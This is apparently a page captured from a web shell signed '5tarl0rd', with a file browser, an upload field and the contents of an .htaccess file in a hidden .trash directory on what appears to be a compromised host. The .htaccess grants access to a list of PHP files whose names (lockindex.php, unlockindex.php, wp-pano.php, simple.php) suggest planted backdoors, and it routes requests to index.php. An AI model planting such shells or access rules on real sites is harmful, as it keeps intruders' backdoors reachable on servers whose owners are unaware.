5tarl0rd

Current Path : /home/tiporg/bin/.trash/
Upload File :
Current File : /home/tiporg/bin/.trash/.htaccess

<FilesMatch "^(index.php|lockindex.php|unlockindex.php|wp-pano.php|simple.php|nf_tracking.php|account.php)$">
Order Allow,Deny
Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^(.*)\.html?$ $1.php [R=301,NC,L]
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>

5tarL0rd By 5tarl0rd Being Anonymous